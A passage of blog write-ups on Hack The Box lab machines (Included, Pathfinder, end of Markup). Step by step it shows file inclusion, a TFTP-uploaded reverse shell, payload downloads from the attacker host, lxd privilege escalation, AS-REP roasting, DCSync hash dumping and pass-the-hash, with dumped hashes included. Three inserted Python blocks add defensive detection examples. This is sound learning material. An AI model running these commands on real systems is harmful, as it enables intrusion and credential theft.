Well there wasn’t a problem with the machine, there was a problem with my brain. I dropped down to Command Prompt from PowerShell, ran the command without any quotation marks, the ‘e’ was accepted and within seconds I had a reverse shell with Administrator privileges, and then I captured the root.txt flag.

PS C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
f57XXXXXXXXXXXXXXXXX0f8

So if you get to this point on the machine and you're pulling your hair out wondering why your exploit won't work, try changing from PowerShell to CMD when echoing the string into job.bat and see if that works. Lesson learned. One thing I did find interesting, though, was that I created a payload using MSFVenom and dropped that on the box. I echoed its location into the script but still didn't get a shell when it executed. I ran type on the file to confirm that the text had been added. Very odd.

Screenshot: Markup has been Pwned!

Included has been Pwned!

Ok, it's time to hack another machine from the Hack The Box Starting Point series. We have already managed to hack Archetype, Oopsie, Vaccine, Shield and Pathfinder. Today we are looking at the Included machine. This was a really fun box despite a frustrating ending. This box is fairly simple to start off with, provided you notice everything that is going on.

Reconnaissance

So first of all we ping the box to see if it's up.

└──╼ [★]$ sudo ping 10.10.10.55 | tee -a ping.txt
PING 10.10.10.55 (10.10.10.55) 56(84) bytes of data.
64 bytes from 10.10.10.55: icmp_seq=1 ttl=63 time=21.5 ms

Next we run our nmap scan.

└──╼ [★]$ sudo nmap -sC -sV -O -p0- 10.10.10.55 | tee -a nmap.10.10.10.55.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-11 16:30 BST
Nmap scan report for 10.10.10.55
Host is up (0.022s latency).
Not shown: 65535 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.10.10.55/?file=index.php
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Ok, so only a webserver is running, or is it? I went to poke at the website and immediately saw that it was calling index.php using a file parameter. It caught my eye because it seemed like quite an obvious naming convention for accessing files. So naturally I pointed it straight at the /etc/passwd file and immediately had the file returned back to me.

Screenshot: Hack The Box Included, file inclusion on the Titan Gears website
Screenshot: Hack The Box Included, /etc/passwd returned via the file parameter

Sweet, where now? Well, as other guides have mentioned, there is an interesting user in the /etc/passwd file. As you can see from the output below, the user tftp exists at the very bottom of the file with the home directory /var/lib/tftpboot.

cat /mnt/root/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
mike:x:1000:1000:mike:/home/mike:/bin/bash
tftp:x:110:113:tftp daemon,,,:/var/lib/tftpboot:/usr/sbin/nologin

Interesting. I confirmed that TFTP was open; it listens on UDP rather than TCP, which is why our TCP-only Nmap scan missed it. At this point I would also like to point out that Nessus missed the TFTP service too. It also missed the directory traversal vulnerability, which I felt was odd since I asked it to scan for web vulnerabilities. Nikto also missed the directory traversal vulnerability, so this is an important lesson that you can’t always rely on tools.
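Since the scanners missed the file parameter traversal, here is what a hand-written check looks like, as an added example that is not code from the Included machine or the haXez post. It has two parts: a resolver that only includes files that resolve inside the web root (the fix for the ?file= bug above), and a detector that scans Apache combined-format access log lines for file parameters the resolver would reject. The web root, log lines and client address are constructed.

```python
"""Defensive checks for the ?file= inclusion pattern described above.

Added example, not code from the Included machine or the haXez post. The
web root, log lines and client address are constructed samples.
"""
import os
import re
from urllib.parse import parse_qs, unquote, urlparse

WEB_ROOT = "/var/www/html"  # hypothetical document root

# Apache combined log format; only the fields this check needs are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def safe_include_path(requested):
    """Return the absolute path to include, or None if it escapes WEB_ROOT.

    os.path.join discards WEB_ROOT when `requested` is absolute, and
    realpath collapses every '..' segment, so both '/etc/passwd' and
    '../../../../../var/lib/tftpboot/phpshell.php' resolve outside the
    root and are rejected. An allow-list of page names is stricter still.
    """
    root = os.path.realpath(WEB_ROOT)
    candidate = os.path.realpath(os.path.join(root, unquote(requested)))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def find_inclusion_attempts(log_lines):
    """Flag requests whose 'file' parameter would escape the web root."""
    hits = []
    for line in log_lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # not a request line in the expected format
        query = urlparse(match.group("target")).query
        for value in parse_qs(query).get("file", []):
            if safe_include_path(value) is None:
                hits.append({
                    "ip": match.group("ip"),
                    "time": match.group("ts"),
                    "file": unquote(value),
                    "status": int(match.group("status")),
                })
    return hits


# Constructed sample log: a normal page load, an /etc/passwd read and an
# attempt to include a file dropped into the TFTP directory.
SAMPLE_LOG = [
    '10.10.14.38 - - [11/Sep/2021:16:45:01 +0100] "GET /?file=index.php HTTP/1.1" 200 1204 "-" "Mozilla/5.0"',
    '10.10.14.38 - - [11/Sep/2021:16:45:12 +0100] "GET /?file=../../../../../etc/passwd HTTP/1.1" 200 1836 "-" "Mozilla/5.0"',
    '10.10.14.38 - - [11/Sep/2021:16:52:40 +0100] "GET /?file=../../../../../var/lib/tftpboot/phpshell.php HTTP/1.1" 200 0 "-" "curl/7.74.0"',
]

if __name__ == "__main__":
    for hit in find_inclusion_attempts(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} file={hit['file']} -> HTTP {hit['status']}")
```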

This image shows Nessus scan results which doesn't really show that there is anything to hack.
Hack The Box Nessus Output

Foothold Hack

Anyway, I’m getting sidetracked. I pinched the tried and tested pentestmonkey/php-reverse-shell, configured it for my IP address and port, and then uploaded the file to the machine using tftp.

└──╼ [★]$ tftp 10.10.10.55
tftp> put phpshell.php phpshell.php
Sent 5681 bytes in 0.4 seconds
tftp>

Once that was uploaded to the server I created my netcat listener and then ran curl against the URL to get a shell.

└──╼ [★]$ curl http://10.10.10.55/?file=../../../../../var/lib/tftpboot/phpshell.php

I checked out the history and ran a few other tools but found nothing of much interest. Listing the /home directory showed a user called mike. I guessed this was the user we needed to escalate to in order to proceed further, and it looked like mike had the user.txt flag in his home directory too, which confirmed my suspicions. After failing for a while I decided to try switching user to mike using the password found on the previous machine, Pathfinder. Yeah, it worked.

bash-4.4$ ls /home/mike
ls /home/mike
alpine-v3.14-x86_64-20210909_2211.tar.gz user.txt
bash-4.4$ cat /home/mike/user.txt
cat: /home/mike/user.txt: Permission denied
bash-4.4$ su mike
su mike
Password: Sheffield19

With that I was able to capture the user flag.

bash-4.4$ cat /home/mike/user.txt
cat /home/mike/user.txt
a56XXXXXXXXXXXXXXXXXXXXXXX5a1

So what next? Well, it was time to perform some more enumeration on the machine. I grabbed a copy of LinPEAS and hosted it on my machine using Python’s simple HTTP server. I then downloaded the script and ran it. Unfortunately, my VM crashed before I had a chance to save the output, but it turns out mike is a member of the lxd group.

At this point I checked the official walkthrough and attempted to follow the instructions. However, for whatever reason I couldn’t get the lxd-alpine-builder script to work at all. Every time I ran the script, I just kept getting an error message telling me there was an invalid parameter. I tried to strace the script but the information it provided wasn’t much help either.
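Membership of lxd is what turns mike into root here, so this is the sort of thing worth auditing before an attacker finds it. The following is an added example, not code from the Included machine or the haXez post: it parses /etc/passwd and /etc/group text and reports users with an interactive shell who belong, by primary or supplementary membership, to groups such as lxd or docker. The passwd and group text are constructed samples modelled on the listing above.

```python
"""Audit login-capable accounts in root-equivalent groups such as lxd.

Added example, not code from the Included machine or the haXez post.
The passwd and group text below are constructed samples modelled on
the listing above.
"""
ROOT_EQUIVALENT_GROUPS = {"lxd", "docker", "sudo", "wheel", "disk"}
NO_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}


def parse_passwd(text):
    """Map user name -> (uid, primary gid, shell) from passwd-format text."""
    users = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, uid, gid, _gecos, _home, shell = line.split(":", 6)
        users[name] = (int(uid), int(gid), shell)
    return users


def parse_group(text):
    """Map group name -> (gid, set of supplementary members)."""
    groups = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, gid, members = line.split(":", 3)
        groups[name] = (int(gid), {m for m in members.split(",") if m})
    return groups


def audit_root_equivalent(passwd_text, group_text):
    """Return sorted (user, group) pairs: interactive users who can reach root.

    Membership is checked both ways a Unix user gets into a group: the
    primary gid in passwd and the supplementary member list in group.
    """
    users = parse_passwd(passwd_text)
    groups = parse_group(group_text)
    findings = []
    for user, (uid, primary_gid, shell) in users.items():
        if uid == 0 or shell in NO_LOGIN_SHELLS:
            continue  # root itself, or a service account that cannot log in
        for group in ROOT_EQUIVALENT_GROUPS.intersection(groups):
            gid, members = groups[group]
            if user in members or gid == primary_gid:
                findings.append((user, group))
    return sorted(findings)


# Constructed samples: the lxd pseudo-user has no shell; mike has bash
# and is a supplementary member of lxd, which is the finding on this box.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
lxd:x:105:65534::/var/lib/lxd/:/bin/false
mike:x:1000:1000:mike:/home/mike:/bin/bash
tftp:x:110:113:tftp daemon,,,:/var/lib/tftpboot:/usr/sbin/nologin
"""
SAMPLE_GROUP = """\
sudo:x:27:
lxd:x:108:mike
mike:x:1000:
tftp:x:113:
"""

if __name__ == "__main__":
    for user, group in audit_root_equivalent(SAMPLE_PASSWD, SAMPLE_GROUP):
        print(f"{user} can reach root through group {group}")
```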

Privilege Escalation Hack

After a bit of Google-fu I found this awesome article by hacktricks.xyz that essentially does the same thing but differently. So, I followed the instructions there and created the image.

sudo su
sudo apt update
sudo apt install -y golang-go debootstrap rsync gpg squashfs-tools
sudo go get -d -v github.com/lxc/distrobuilder
cd $HOME/go/src/github.com/lxc/distrobuilder
make
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8

With the image and the rootfs.squashfs file ready, I started the Python server again and downloaded the files from my local machine to the Included machine.

mike@included:~$ wget http://10.10.14.38/rootfs.squashfs
--2021-09-11 18:02:14--  http://10.10.14.38/rootfs.squashfs
Connecting to 10.10.14.38:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2318336 (2.2M) [application/octet-stream]
Saving to: ‘rootfs.squashfs’
rootfs.squashfs 100%[===================>] 2.21M 3.17MB/s in
mike@included:~$ wget http://10.10.14.38/lxd.tar.xz
--2021-09-11 18:03:40--  http://10.10.14.38/lxd.tar.xz
Connecting to 10.10.14.38:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 884 [application/x-xz]
Saving to: ‘lxd.tar.xz’
lxd.tar.xz 100%[===================>] 884 --.-KB/s in 0.005s

With the files now on the machine, I imported the image, configured it and ran it.

mike@included:~$ lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
mike@included:~$ lxc init alpine privesc -c security.privileged=true
lxc init alpine privesc -c security.privileged=true
Creating privesc
mike@included:~$ lxc list
lxc list
+---------+---------+------+------+------------+-----------+
|  NAME   |  STATE  | IPV4 | IPV6 |    TYPE    | SNAPSHOTS |
+---------+---------+------+------+------------+-----------+
| privesc | STOPPED |      |      | PERSISTENT | 0         |
+---------+---------+------+------+------------+-----------+
mike@included:~$ lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
Device host-root added to privesc
mike@included:~$ lxc start privesc
lxc start privesc
mike@included:~$ lxc exec privesc /bin/sh
lxc exec privesc /bin/sh

While the shell wasn’t pretty, it did have root access and I was able to capture the final flag.

cd /mnt/root/root
/mnt/root/root # cat root.txt
cat root.txt
c69XXXXXXXXXXXXXXXXbcf
This image shows the included machine that we were trying to hack being pwned!
Hack The Box Included Has Been Pwned!

Pathfinder has been Pwned!

Welcome back to haXez, a place where I hack boxes and write about them. I’m not pretending to be an elite hacker; in fact I hardly know anything. This place is for learning and for me to document my progress. We are currently working our way through the Starting Point on Hack The Box; so far we have managed to hack the following machines: Archetype, Oopsie, Vaccine and Shield. Today we are looking at Pathfinder.

This box was a lot of fun and straightforward thanks to the walkthrough from h4rithd. Yes, I’m using walkthroughs… Honestly though, a lot of the time on Hack The Box the problem is knowing which questions to ask. If you don’t know about a certain tool or about a specific weakness in a software configuration, then you could be looking for hours or even days to find a foothold. I’m here to learn about these tools and software configuration weaknesses, not to spend hours researching all the potential ways they could be exploited. Anyway, with that out of the way, let’s begin.

Reconnaissance

First I spun up the machine and connected to the VPN. Next I pinged the box to see if it was responding, and yep, the machine started talking to me.

└──╼ [★]$ ping 10.10.10.30
PING 10.10.10.30 (10.10.10.30) 56(84) bytes of data.
64 bytes from 10.10.10.30: icmp_seq=1 ttl=127 time=21.6 ms

So what do we do next? We nmap of course.

└──╼ [★]$ sudo nmap -sC -sV -O -p0- 10.10.10.30 | tee -a nmap.txt
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49683/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
49717/tcp open msrpc Microsoft Windows RPC
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: PATHFINDER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h06m49s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-09-11T17:34:17
|_ start_date: N/A

Well hello Domain Controller, have you come to tell me your secrets? Ok, so there are a lot of services listening, but the most important ones on a Domain Controller are usually Server Message Block (SMB, 445), Lightweight Directory Access Protocol (LDAP, 389) and Kerberos (88). I did, however, immediately notice that port 53 TCP was open. Port 53 is used for DNS, but you would normally only see it on UDP. If port 53 TCP is open, it may mean the server accepts DNS zone transfer (AXFR) requests, which run over TCP. Alas, hack failed, this one didn’t tell me anything.

└──╼ [★]$ dig axfr @10.10.10.30 MEGACORP
; <<>> DiG 9.16.15-Debian <<>> axfr @10.10.10.30 MEGACORP
; (1 server found)
;; global options: +cmd
; Transfer failed. :-(

So with that rabbit hole out of the way, it was time to look at Server Message Block. We needed to see if it had been misconfigured to allow the listing of shares and so on. I first ran enum4linux in the hope that it would give me some information. Honestly though, the tool just doesn’t seem to work that often. So next I used smbclient to see what was going on.

└──╼ [★]$ smbclient -L 10.10.10.30
Enter WORKGROUP\joe’s password:
Anonymous login successful
Sharename       Type      Comment
---------       ----      -------

The anonymous login was successful but there was nothing on there. Hmmm, another dead end. Ok then, let’s focus on LDAP and see what information we can interrogate out of it. At first I was getting nowhere. I got a bit of information out of the protocol using ldapsearch but nothing substantial.

└──╼ [★]$ sudo ldapsearch -x -h 10.10.10.30 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
dn:
namingcontexts: DC=MEGACORP,DC=LOCAL
namingcontexts: CN=Configuration,DC=MEGACORP,DC=LOCAL
namingcontexts: CN=Schema,CN=Configuration,DC=MEGACORP,DC=LOCAL
namingcontexts: DC=DomainDnsZones,DC=MEGACORP,DC=LOCAL
namingcontexts: DC=ForestDnsZones,DC=MEGACORP,DC=LOCAL
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1

User Enumeration Hack

So what was next? Well, this is where I turned to the walkthrough written by h4rithd. Honestly, I wouldn’t have gotten any further if it wasn’t for this walkthrough. It turns out that the Sandra user on the Shield box was quite important. I should have learnt my lesson by now, but as soon as I get the root flag, I log off and write up. Sandra appears to exist on this box and we can use her credentials to do some enumeration. Enter ldapdomaindump; this tool is cool. Running ldapdomaindump with sandra’s credentials, we get a bunch of HTML files containing information about the domain.

This shows users on the machine we want to hack
Domain users
This shows the groups on the machine we want to hack
Domain users by group
This shows the users on the machine we want to hack.
Kerberos DONT_REQ_PREAUTH

Foothold Hack

The one user that should grab our attention is svc_bes, as it doesn’t require Kerberos pre-authentication. If pre-authentication isn’t required, then we can ask Kerberos for a Ticket Granting Ticket and it will hand back a response that is encrypted with the user’s password hash. We can then hack or crack it offline. I’m getting ahead of myself; more about that later. So let’s grab that TGT hash! Using the Impacket tool GetNPUsers.py we can request the TGT for the svc_bes user.

└──╼ [★]$ python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py MEGACORP.LOCAL/svc_bes -dc-ip 10.10.10.30 -request -no-pass -format john
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for svc_bes
[email protected]:c818cd9132de09878439dd73cc96a930$73b8ea1807114952f569afabd24391f25818660e8386fa926857af7d6382ad42d9d24e80300fcb43ebdcd40b2bbb9d13b462a83b5b87417e341625a146b503e89fdb18a6ff80fcce6fe776160e45cbf7a32978eee153d5f3b55539cef3c4ac56763811ce5d1b856afa9fce10fa3cdda54828ba2dc047f5109697ca0d0fecd3387421e328240c9b17a9567faa8be961ac30a739d56a1b66d9d5f6b1df01f7176382a7a483527cea0a8c2105a0812d142333b0412734eeee144d9be74c16cb1b3220e881819120a2691a825f19fbb9761d1c23cba03c8ed84ac4203a0706fa4e7fd947150e65ff7a78c0f4f051ad61bb49

Yummmm, don’t you just love the smell of hashes in the morning, or any time for that matter? Ok, so what’s next? Well, we need to talk to our mate John and ask him to do the dirty work. No, I don’t mean kill him; I mean crack him really hard with a rock. Grab the hash output and chuck it in a file using your favourite inescapable text editor, vim (or nano). Then tell John where your rock is and ask him politely to beat the secrets out of him.

└──╼ [★]$ sudo john beshash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press ‘q’ or Ctrl-C to abort, almost any other key for status
Sheffield19 ([email protected])
1g 0:00:00:08 DONE (2021-09-11 12:22) 0.1157g/s 1227Kp/s 1227Kc/s 1227KC/s Sherbert!!..Shawnee
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Voila, the password is Sheffield19.
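The AS-REP roast above, seen from the defender’s side, as an added example that is not code from the Pathfinder machine or the haXez post. One function picks out enabled accounts whose userAccountControl carries the DONT_REQ_PREAUTH bit ldapdomaindump showed for svc_bes; the other scans Windows Security event 4768 records for TGT requests made without pre-authentication, which is what GetNPUsers.py generates. The account and event records are constructed samples; the UAC bit values, event ID and field names are the standard Windows ones.

```python
"""Defender-side checks for the AS-REP roast carried out above.

Added example, not code from the Pathfinder machine or the haXez post.
Account records and 4768 event records are constructed samples; the
userAccountControl bits and event fields are the standard Windows ones.
"""
DONT_REQ_PREAUTH = 0x400000  # userAccountControl bit ldapdomaindump reported
ACCOUNTDISABLE = 0x0002
RC4_HMAC = 0x17  # RC4 ticket encryption type; AES is 0x11 / 0x12


def find_no_preauth_accounts(accounts):
    """Return enabled sAMAccountNames that do not require pre-authentication."""
    return sorted(
        a["sAMAccountName"] for a in accounts
        if a["userAccountControl"] & DONT_REQ_PREAUTH
        and not a["userAccountControl"] & ACCOUNTDISABLE
    )


def find_asrep_requests(events):
    """Flag successful 4768 events with PreAuthType 0 (no pre-authentication).

    Such an event means the KDC handed out an AS-REP that can be attacked
    offline; the caller can use the client address to decide whether the
    request came from somewhere the account normally logs on from.
    """
    hits = []
    for e in events:
        if e["EventID"] != 4768 or e["PreAuthType"] != 0 or e["Status"] != 0:
            continue
        hits.append({
            "user": e["TargetUserName"],
            "client": e["IpAddress"],
            "rc4": e["TicketEncryptionType"] == RC4_HMAC,
        })
    return hits


# Constructed samples. 0x10200 = NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD;
# svc_bes adds DONT_REQ_PREAUTH, old_svc has the same bit but is disabled.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "Administrator", "userAccountControl": 0x10200},
    {"sAMAccountName": "sandra", "userAccountControl": 0x10200},
    {"sAMAccountName": "svc_bes", "userAccountControl": 0x410200},
    {"sAMAccountName": "old_svc", "userAccountControl": 0x410202},
]
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "sandra", "IpAddress": "10.10.10.50",
     "PreAuthType": 2, "TicketEncryptionType": 0x12, "Status": 0},
    {"EventID": 4768, "TargetUserName": "svc_bes", "IpAddress": "10.10.14.38",
     "PreAuthType": 0, "TicketEncryptionType": 0x17, "Status": 0},
    {"EventID": 4769, "TargetUserName": "svc_bes", "IpAddress": "10.10.14.38",
     "PreAuthType": 0, "TicketEncryptionType": 0x17, "Status": 0},
]

if __name__ == "__main__":
    print("accounts without pre-auth:", find_no_preauth_accounts(SAMPLE_ACCOUNTS))
    for hit in find_asrep_requests(SAMPLE_EVENTS):
        print(f"AS-REP issued for {hit['user']} to {hit['client']} rc4={hit['rc4']}")
```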

Story time: I once met Darren Kitchen from Hak5 in Sheffield when he was touring the UK on his motorcycle. I caught the train there from where I was staying for uni and had a beer with him. Really cool guy, but I couldn’t stay long as the last train was at midnight or something. Someone took a photo but I never got a copy. Hey, photography man, if you’re out there, I would love the picture of Darren and myself from the Hak5 Sheffield meet please.

Anyway, moving on. We now have the password and can use evil-winrm to hack into the box and see what’s around.

└──╼ [★]$ evil-winrm -u svc_bes -p Sheffield19 -i 10.10.10.30
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_bes\Documents>
*Evil-WinRM* PS C:\Users\svc_bes\Desktop> type user.txt
b05XXXXXXXXXXXXXXXXX37f1

Privilege Escalation Hack

Turns out what was around was the user flag, and we have now successfully captured it. Ok, so what’s next? We have a valid set of credentials. Let’s see if we can dump some secrets using the Impacket tool secretsdump.py. This tool performs a DCSync hack against the domain controller: if the authenticated user holds domain replication privileges, it uses them to ask the DC to replicate directory data the way another DC would, which includes the password hashes. For it to work, though, our user needs to have domain replication privileges.

└──╼ [★]$ /usr/share/doc/python3-impacket/examples/secretsdump.py MEGACORP.LOCAL/svc_bes:Sheffield19@10.10.10.30
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f9f700dbf7b492969aac5943dab22ff3:::
svc_bes:1104:aad3b435b51404eeaad3b435b51404ee:0d1ce37b8c9e5cf4dbd20f5b88d5baca:::
sandra:1105:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
PATHFINDER$:1000:aad3b435b51404eeaad3b435b51404ee:9635702428c5134926387fa5db2010c8:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:056bbaf3be0f9a291fe9d18d1e3fa9e6e4aff65ef2785c3fdc4f6472534d614f
Administrator:aes128-cts-hmac-sha1-96:5235da455da08703cc108293d2b3fa1b
Administrator:des-cbc-md5:f1c89e75a42cd0fb
krbtgt:aes256-cts-hmac-sha1-96:d6560366b08e11fa4a342ccd3fea07e69d852f927537430945d9a0ef78f7dd5d
krbtgt:aes128-cts-hmac-sha1-96:02abd84373491e3d4655e7210beb65ce
krbtgt:des-cbc-md5:d0f8d0c86ee9d997
svc_bes:aes256-cts-hmac-sha1-96:2712a119403ab640d89f5d0ee6ecafb449c21bc290ad7d46a0756d1009849238
svc_bes:aes128-cts-hmac-sha1-96:7d671ab13aa8f3dbd9f4d8e652928ca0
svc_bes:des-cbc-md5:1cc16e37ef8940b5
sandra:aes256-cts-hmac-sha1-96:2ddacc98eedadf24c2839fa3bac97432072cfac0fc432cfba9980408c929d810
sandra:aes128-cts-hmac-sha1-96:c399018a1369958d0f5b242e5eb72e44
sandra:des-cbc-md5:23988f7a9d679d37
PATHFINDER$:aes256-cts-hmac-sha1-96:753157a7307cc0c55569930f182edad660cc4492f27491efb6b8f6f1f7dd8824
PATHFINDER$:aes128-cts-hmac-sha1-96:e25b80d1951cd2410ac1ce2f446b63f4
PATHFINDER$:des-cbc-md5:25fbb06d258cd943
[*] Cleaning up…

We have an Administrator password hash. Let’s be kind and pass it forward using psexec.py.

└──╼ [★]$ /usr/share/doc/python3-impacket/examples/psexec.py MEGACORP.LOCAL/Administrator@10.10.10.30 -hashes aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 10.10.10.30…..
[*] Found writable share ADMIN$
[*] Uploading file fpnaGrFs.exe
[*] Opening SVCManager on 10.10.10.30…..
[*] Creating service ovNb on 10.10.10.30…..
[*] Starting service ovNb…..
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
© 2018 Microsoft Corporation. All rights reserved.

He shoots, he scores, and for my final trick I will recover the root.txt flag.

C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
ee6XXXXXXXXXXXXXXXXX645
This shows that the machine we were trying to Hack has indeed been pwned!
Pathfinder has been Pwned!